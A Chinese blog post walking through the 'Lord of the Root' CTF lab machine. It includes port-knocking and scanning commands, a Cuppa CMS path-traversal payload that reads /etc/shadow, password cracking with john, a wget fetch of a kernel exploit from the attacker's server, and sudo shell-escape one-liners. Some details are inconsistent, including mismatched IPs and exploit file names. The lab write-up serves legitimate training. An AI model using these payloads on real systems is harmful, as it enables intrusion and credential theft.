load of the root拿flag思路

最新推荐文章于 2024-07-25 23:21:47 发布
最新推荐文章于 2024-07-25 23:21:47 发布
阅读量49 收藏
点赞数
分类专栏: red team 文章标签: 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66583740/article/details/134389017
版权

load of the root拿flag思路
1.主机发现,端口扫描
2.21,22,80和3306端口 的发现
3.访问80端口,发现是apache的首页,无果
4.发现21端口存在anonymous用户
5.ftp访问anonymous发现有三个文件,结果毛都没有
6.对80端口进行目录扫描一下
7.发现使用了cuppa的cms
8.搜索cuppa-cms的相关漏洞,存在Local/Remote File Inclusion
9.漏洞利用读取本地shadow
10.使用john 爆破密码
11.ssh连接
12.查看版本和内核看是否可以内核提权,提权报错
13.发现有sudo权限,尝试sudo 提权
14.在 /root 下获得 flag

第一步:找到目标主机

首先ifconfig找到本机ip
在这里插入图片描述
通过netdiscover扫描存活主机

netdiscover -r 172.16.12.0/24

在这里插入图片描述
nmap -T5 -A -Pn 172.16.12.138
在这里插入图片描述
通过nmap扫描出来22端口,发现22端口存在Knock Friend To Enter,
在这里插入图片描述
通过查询发现这是Port knocking
端口碰撞: 端口上的防火墙通过产生一组预先指定关闭的端口进行连接尝试,一旦接收到正确的连接尝试序列,防火墙规则就会动态修改,以允许发送连接尝试的主机通过特定端口进行连接。
有三种方法:

第一种:
knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v
knock 172.16.12.138 1 2 3 -v
第二种:
nmap 172.16.12.138 -Pn -p 1
第三种:
hping3 -S 172.16.12.138 -p 1 -c 1

在这里插入图片描述
重新再扫一次端口
nmap -T5 -A -Pn -p- 172.16.12.138

在这里插入图片描述
发现除22端口外,还存在1337端口,访问发现存在网页
利用21端口的Anomonous进行访问
发现无果,都是一些废话,继续打开80端口,进行目录扫描

第二步:目录扫描

python dirsearch.py -u http://192.168.159.132/ -e * -x 403,404

在这里插入图片描述
从上到下,进行访问,看是否有突破点
从中发现了使用的是cuppa cms,还有一个wordpress,但无果

搜索相关的payload

searchspoit cuppa
searchspoit wordpress

在这里插入图片描述
在这里插入图片描述
尝试利用25971.txt

https://www.exploit-db.com/exploits/25971

在这里插入图片描述
拼接访问

http://192.168.159.132/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

发现没发现,可能是路劲拼接错误,继续尝试

http://192.168.159.132/administrator/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

这个也报错,最后尝试发现去掉cuppa就可以访问了,但是显示空白的

http://192.168.159.132/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

在这里插入图片描述
继续返回漏洞介绍,发现是$_REQUEST,可能是GET也可能是POST,尝试POST
在这里插入图片描述
出现了/etc/shadow,有账户和加密密码

尝试用John the ripper进行密码爆破,首先把字符串复制出来
在这里插入图片描述

john shadow

在这里插入图片描述
尝试SSH连接
在这里插入图片描述

第三步:提权

通过查询系统版本和内核版本,看是否可以内核提权

lsb_release -a
uname -a

在这里插入图片描述

发现ubuntu版本为16.04.3,内核为4.13.0
使用 searchsploit 从 exploit-db 中搜索相关信息

searchsploit ubuntu 4.13

在这里插入图片描述
尝试使用,并查看使用方法

searchsploit -m 45010.c
vi 45010.c

在这里插入图片描述
本地起一个HTTP服务

python3 -m SimpleHTTPServer 8081
若出现No module named SimpleHTTPServer,使用下面的 
python3 -m http.server 8081

bash shell端进行下载

wget http://192.168.159.129:8081/45010.c

编译EXP
根据使用条件 进行利用
gcc 37292.c -o exp —GCC编译.o文件
./exp —利用exp

在这里插入图片描述
利用失败
在这里插入图片描述
尝试是否存在sudo提权

https://www.yisu.com/zixun/461396.html

sudo -V

在这里插入图片描述
可能存在sudo提权

find 命令提权:
sudo find . -exec /bin/sh \; -quit
python 命令提权:
sudo python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
进入root目录下,发现flag.txt
在这里插入图片描述

总结:

这个靶机主要是考察了三个点,目录扫描,cms漏洞,sudo提权

blue_EDG
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
获取flag
qq_49091880的博客
01-02 1万+
获取FLAG值 一、SSH服务器 1.如何从外部进入最终root主机,获得flag值 SSH:建立在应用层基础上的协议 SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的 协议。利用SSH协议可以有效防止远程管理过程中的信息泄露问题 2.SSH基于TCP 22端口的服务 3.SSH协议认证机制 (1)基于口令的安全验证 (2)基于密钥的安全验证 注:id_rsa:私钥 id_rsa.pub:公钥 二、实验环境 1.攻击机:192.168.1.105 2.靶机机器:192.168.1.106
CTF训练 ssh服务渗透:如何从外部进入最终root主机,取得flag
weixin_44716769的博客
10-31 3960
CTF训练 ssh服务渗透 如何从外部进入最终root主机,取得flag SSH协议介绍 SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。 SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程中的信息泄露问题。 SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有
21. CTF综合靶机渗透(十四)
weixin_30787531的博客
07-29 318
靶机说明: I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on the OS...
<vulnhub>-记一次实验Load of The Root
daoshiwa的博客
09-20 321
探测到主机IP:192.168.88.159。
sqlmap详解及实战拿flag
weixin_43996007的博客
12-19 4558
sqlmap详解及实战拿flag 一、sqlmap介绍 sqlmap是一个非常强大的自动化SQL注入工具,其主要功能是扫描,发现并利用SQL注入漏洞。sqlmap工具支持多种sql注入技术,它们分别是: 1)基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2)基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3)基于报...
acpi控制笔记本风扇转速
04-16
Optimized the Load ASL operator in the case where the source operand is an operation region. Simply map the operation region memory, instead of performing a bytewise read. (Region must be of type ...
BURNINTEST--硬件检测工具
05-12
- Added a hot Key, F4, to set the auto run flag and run the tests (i.e. set "-r" and then run the tests). - Other minor changes. Release 5.3 build 1018 WIN32 release 16 April 2008 - Added an ...
linux全志R16的linux系统编译的资料_20170502_1655.7z
05-02
makeinfo is usually part of the texinfo package in your distribution make: *** [dependencies] 错误 1 make:离开目录“/home/wwt/linux_r16/lichee/buildroot” ERROR: build buildroot Failed rootroot@cm-...
tomcat-7_API_帮助文档
06-26
To avoid this problem, place classes that load native libraries outside of the web application, and ensure that the loadLibrary() call is executed only once during the lifetime of a particular JVM. ...
Unity Skele: Character Animation Tools 1.96p2 - 角色动作调整插件
07-25
9. Generate RootMotion from RootBone curves 10. Export character mesh and character animation into DAE archive 11. Edit multi-part meshes 12. Fix BindPose of skinned mesh (position and rotation) 13. ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8350
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Linux:进程信号(二.信号的保存与处理、递达、volatile关键字、SIGCHLD信号)
qq_74415153的博客
07-25 1139
1.信号保存 1.1递达、未决、阻塞等概念 1.2再次理解信号产生与保存 1.3信号集操作函数 sigset_t类型 sigprocmask系统调用 sigpending系统调用 2.信号的处理/递达 2.1信号处理时机与过程 2.2用户态和内核态 2.3再看进程地址空间 谁来运行OS 2.4信号的捕捉-sigaction()函数 3.补充知识 3.1可重入函数 3.2volatile关键字 3.3 SIGCHLD信号
Linux:线程池
最新发布
qq_45481606的博客
07-25 283
线程池是生产者和消费者模型中的一部分,线程池主要维护一个任务队列和消费者线程,生产者通过线程池提供的API接口把任务放入任务队列,消费者线程通过循环不断取任务,线程池中的任务是数据的处理流程是一堆函数,所以任务队列中存的是函数的地址。任务队列,线程用来处理任务,线程不能立刻处理完任务就需要把任务存起来。工作线程:从线程池维护的任务队列里取任务,相当于消费者。工作线程需要从线程池的任务队列中取任务,所以需要参数。任务队列为空,消费者线程使用条件队列阻塞。管理者线程:用来管理工作线程,只有一个。
Linux相关指令
m0_46502962的博客
07-25 135
其中的-lpthread不是必须的,只有用到该库才输入加上。//该指令将demo.c生成的a.out文件命名为demo8。//将运行结果放到test.ret.txt文件中,没有就创建。1.查看手册 man 3 free。将该运行程序放到后台运行。③(gbd)r 运行。④(gbd)q 退出。
Linux Vim教程:多文件编辑与窗口管理
07-25 849
Vim作为一款功能强大的文本编辑器,支持多文件编辑和窗口管理。掌握这些高级技巧可以大大提高工作效率和文件处理能力。本文将详细介绍Vim中多文件编辑与窗口管理的各种方法和技巧,包括缓冲区、标签页、分屏、快速切换等。通过这些实用技巧,您可以更高效地在Vim中进行复杂的文本编辑任务。
linux】Shell脚本三剑客之awk命令的详细用法攻略
景天科技苑
07-24 3314
Linux和Unix系统中,awk是一种强大的文本处理工具,广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行,能够逐行读取输入文本文件,并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法,包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。
Linux】管道通信和 system V 通信
Front123456的博客
07-24 791
因为它们的第一个字段 ipc_perm 是一样的,所以可以维护一个 struct ipc_perm* 的指针数组,存共享内存、消息队列、信号量它们三者中,第一个元素的地址,也就是 &ipc_perm。这样就可以把共享内存、消息队列和信号量三个部分直接管理起来了。而我们知道结构体的第一个成员的地址和结构体对象的地址在数值上是相同的,并且操作系统在内部可以识别这个对象是共享内存、消息队列和信号量中的哪一个,因此我们拿到这个数组中的 ipc_perm 地址便能访问这结构体的其它成员,将它们管理起来
Linux 系统下 Conda 环境安装教程
时光会把你雕刻成,你应有的模样!
07-24 1262
Conda 是一个开源的包、依赖和环境管理系统,常用于科学计算领域,特别是Python环境中,它允许用户轻松地安装、运行和更新包及其依赖项,并且可以创建多个相互隔离的环境,以避免不同项目之间的依赖冲突。以下是在Linux系统上安装Conda环境的详细步骤。通过以上步骤,你应该能够在Linux系统上成功安装Conda,并学会如何创建、激活、管理和退出conda环境。Conda为科学计算和数据科学项目提供了强大的环境管理功能,是Python开发者的得力助手。
Linux下pip的安装、命令总结、换源
2301_79695159的博客
07-24 507
Linux下pip的安装、命令总结、换源
Failed to load resource: the server responded with a status of
03-23
"Failed to load resource: the server responded with a status of" 是一个常见的网络错误信息,它表示在加载网页时,浏览器无法成功获取某个资源(如图片、脚本、样式表等),因为服务器返回了一个错误的状态码。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值